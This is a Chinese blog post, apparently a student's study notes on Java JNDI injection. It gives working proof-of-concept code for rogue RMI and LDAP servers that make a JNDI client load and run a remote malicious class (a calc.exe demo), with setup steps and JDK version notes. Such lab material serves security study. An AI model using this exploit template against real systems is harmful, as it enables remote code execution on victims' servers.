JNDI注入学习

最新推荐文章于 2024-05-29 07:43:29 发布
最新推荐文章于 2024-05-29 07:43:29 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: java安全 代码审计 文章标签: 安全 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121735066
版权

JNDI注入

简单记录一下学习JNDI时学习到的知识点

JNDI是什么?

前面我们学习过RMI远程方法调用,那是一个RMI SERVER - RMI Client的结构,而 JNDI 也可以从RMI SERVER中获取到对象并执行其中的方法。那么这两者有什么区别呢?

RMI SERVER - RMI Client 结构,方法最终是在RMI SERVER端中执行的

RMI SERVER - JNDI 结构,方法最终是在JNDI客户端执行的

在RMI SERVER - JNDI 结构中,RMI SERVER不只可以绑定本地的对象,还可以通过References类来绑定一个外部对象(这个外部对象的意思是可以通过url进行访问到的,这个url可以指向本地,也可以指向非本地)

JNDI利用RMI执行系统命令

当RMI SERVER - JNDI 结构中的RMI SERVER绑定的是一个外部对象,这时当JNDI通过lookup一个对象时,RMI SERVER返回的是一个ReferenceWrapper_Stub,然后通过ReferenceWrapper_Stub获得一个Reference对象(如下图),然后根据这个对象里的className属性在本地的className指定路径查找有没有Reference对象对应的类,有则直接拿本地的,没有则从classFactoryLocation属性指定的URL中去加载
image-20211205200230978
图片中的Reference对象对应下面代码中的Reference对象,从这里可以知道classFactory、className、factoryLocation属性都是我们可以控制的,那么我们就可以控制JNDI客户端在从哪里加载恶意类了

漏洞演示代码如下(复现时JDK版本为jdk7u80)

RMI Server

package com.vul.JNDI;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(8999);
        Reference reference = new Reference("1","Evil","http://127.0.0.1:9999/");
        ReferenceWrapper ref = new ReferenceWrapper(reference);
        registry.bind("payload",ref);
    }
}

Evil恶意类(不要和RMI Server放在同一个包下,否则不用开启web服务也能找到这个类)

public class Evil {
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

JNDI客户端

package com.vul.JNDI;

import javax.naming.InitialContext;

public class Client {
    public static void main(String[] args) throws Exception{
        InitialContext initial = new InitialContext();
        initial.lookup("rmi://127.0.0.1:8999/payload");
    }
}

先开启RMI Server,后把Evil进行编译,再在Evil恶意类目录下用python -m http.server 9999开启一个简单的web服务,监听端口为9999,此时访问http://127.0.0.1:9999/Evil.class就能访问到Evil恶意类,最后启动JNDI客户端就能在JNDI客户端的电脑上弹出计算机

注意点

  1. 第一个就是前面说到的Evil恶意类不要和RMI Server放在同一个包下,甚至是同一个项目
  2. 第二个就是Evil恶意类不能有包名,也就是不能有package xxx,因为有包名的话在通过javac编译java文件时会在方法名也加上包名,这时候会导致不匹配

为什么能在JNDI客户端执行命令?

前面只是说到了能控制JNDI客户端从哪里加载 类,但是为什么会执行命令呢?其实在InitialContext.lookup方法下个断点调试就不难发现在加载类的时候是通过Class.forName加载类的,且第二个参数为true,这时候就会执行恶意类的静态代码块。加载类之后再通过(ObjectFactory) clas.newInstance()实例化类,这时候就会执行恶意类的构造方法。在实例化之后把类转换为ObjectFactory,之后再调用factory.getObjectInstance方法,factory就是实例化的对象,所以恶意类中的getObjectInstance方法的代码也会被执行,但是前提条件是实例化出来的对象能成功转换为ObjectFactory,那么就需要恶意类 实现 ObjectFactory接口。

所以,构造的恶意类可以在三个地方写入命令执行代码

  1. 在构造方法中写入恶意代码
  2. 在静态代码块中写入恶意代码
  3. 在getObjectInstance方法中写入恶意代码,这时候需要恶意类 实现 ObjectFactory接口

JNDI利用RMI的局限性

JNDI利用RMI存在版本局限,下面贴一张啦啦0咯咯师傅的图
image-20211205202714430
JNDI不只是可以调用RMI服务,还可以调用LDAP服务,且没有那么多的版本局限!

JNDI利用LDAP

需要先引入一个依赖

<dependency>
    <groupId>com.unboundid</groupId>
    <artifactId>unboundid-ldapsdk</artifactId>
    <version>6.0.0</version>
</dependency>

直接上漏洞演示代码(复现时JDK版本为jdk7u15)

LdapServer

package org.vul;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;

public class LdapServer {
    private static final String LDAP_BASE = "dc=example,dc=com";


    public static void main (String[] args) {

        String url = "http://127.0.0.1:9999/#Evil";
        int port = 8999;


        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();

        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         *
         */
        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }


        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "Exploit");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if ( refPos > 0 ) {
                cbstring = cbstring.substring(0, refPos);
            }
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference");
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
}

Evil恶意类

public class Evil{
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

JNDI客户端

package org.vul;

import javax.naming.InitialContext;

public class Client {
    public static void main(String[] args) throws Exception{
        InitialContext initial = new InitialContext();
        initial.lookup("ldap://127.0.0.1:8999/payload");
    }
}

JNDI利用LDAP的局限性

JNDI利用LDAP存在版本局限,下面贴一张啦啦0咯咯师傅的图

image-20211205203839991

总结

本文只是简单叙述了学习JNDI过程中遇到的一些注意点,学习的话还是参考下面链接吧,文章可能存在理解上的偏差,若有错误,还请指正

https://xz.aliyun.com/t/6633
https://kingx.me/Exploit-Java-Deserialization-with-RMI.html
https://ego00.blog.csdn.net/article/details/120048519

0x6b79
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
【漏洞】log4j2远程执行代码复现实操代码例子
肉段_Dxd的博客
12-11 4302
关于近日log4j漏洞导致的远程执行代码的复现例子,利用JNDI的ldap攻击,使远程服务可能执行了恶意代码
JAVA安全之Log4j-Jndi注入原理以及利用方式
最新发布
qq_53058639的博客
05-29 645
JDNI(Java Naming and Directory Interface)是Java命名和目录接口,它提供了统一的访问命名和目录服务的API。JDNI主要通过JNDI SPI(Service ProviderInterface)规范来实现,该规范定义了对JNDI提供者应实现的接口。在JNDI体系JNDI提供者是指实际提供命名和目录服务的软件组件。JNDISPI规范包含了多个接口,其最为重要的是Context接口。
JNDI注入详解
m0_60571990的博客
03-02 3781
JNDI注入详解
[Java安全]—JNDI注入
Sentiment的博客
07-08 2613
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
JNDI注入学习(看不懂直接喷,别忍着!)
一剑开天门!的博客
01-13 2835
JNDI注入学习(看不懂直接喷,别忍着!)
JNDI注入学习1
08-03
**JNDI注入详解** Java Naming and Directory Interface (JNDI) 是Java应用程序用来查找和管理网络资源的接口。它不依赖于特定的目录服务,而是通过服务提供者接口(SPI)来支持多种不同的目录服务,如LDAP、DNS等...
JNDI示例整合SSH
09-22
可以利用Spring的JNDI_lookup标签或者`jee:jndi-lookup`元素来查找并注入JNDI资源,例如数据源。这样,Spring管理的bean可以直接使用由JNDI查找得到的数据源。 3. **Hibernate:** Hibernate作为ORM框架,用于对象-...
EJB学习笔记.doc
05-14
* 第 7 章:给 EJB 增加功能(Bean 的调用、公用的标注、依赖注入、拦截器) * 第 8 章:实体高级部分 * 第 9 章:事务 * 第 10 章:EJB 安全 * 第 11 章:定时服务(任务管理) 五、EJB 相关技术 * JNDI...
JNDIDemo 以及相关文档
05-14
8. **JNDI与EJB和JDBC**:在Enterprise JavaBeans (EJB) JNDI用于查找和注入EJB实例。在Java Database Connectivity (JDBC) ,数据源通常通过JNDI查找来获取,这样可以轻松地在不同环境配置数据库连接。 9....
J2EE学习资料
05-16
J2EE学习资料对于初学者来说至关重要,因为这个平台涵盖了许多关键的技术和概念,包括Servlet、JSP、EJB、JMS、JTA、JNDI等。 1. **Servlet**:Servlet是Java用于处理HTTP请求的服务器端组件。它是动态Web应用的...
JNDI注入
Christ1na的博客
11-17 750
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5451
JDNI注入总结
JNDI注入详解(自学)
m0_64481831的博客
03-03 1187
Jndi叫Java命名和目录的接口,可以类比为一个字典(就比如用一个目录路径去定义一个文件,目录路径和文件就是键值)。在Java应用除了以常规方式使用名称服务(比如使用DNS解析域名) ,另一个常见的用法是使用目录服务作为对象存储的系统来存储和获取Java对象(比如使用打印机,在目录服务查找打印机然后获得一个打印机对象)。Jndi包含在Java SE平台。要使用Jndi,您必须拥有Jndi类和一个或多个服务提供者(SPI)。JDK包含以下命名/目录服务的服务提供者:轻量级目录访问协议(LDAP。
JNDI注入+高版本绕过+工具使用
GalaxySpaceX的博客
06-21 2362
JNDI注入+高版本绕过+工具使用
【Java代码审计】JNDI注入
大河之犬的博客
03-07 1342
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDI 是 Java EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9391
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
HTTP 无法注册 URL http://127.0.0.1:9999/calculatorservice/metadata。进程不具有此命名空间的访问权限
热门推荐
jazywoo_在路上
06-17 3万+
开始学习WCF程序,运行的时候却发现出如下问题: HTTP 无法注册 URLhttp://127.0.0.1:9999/calculatorservice/metadata。进程不具有此命名空间的访问权限(有关详细信息,请参见 http://go.microsoft.com/fwlink/?LinkId=70353)。 按照例子一开始就遇到这样的问题,后来从网上看到,原因可能是Win
【java安全JNDI注入概述
leekos的博客,分享web安全相关知识~
08-24 1274
是Java提供的Java命名和目录接口。通过调用JNDI的API可以定位资源和其他程序对象。命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值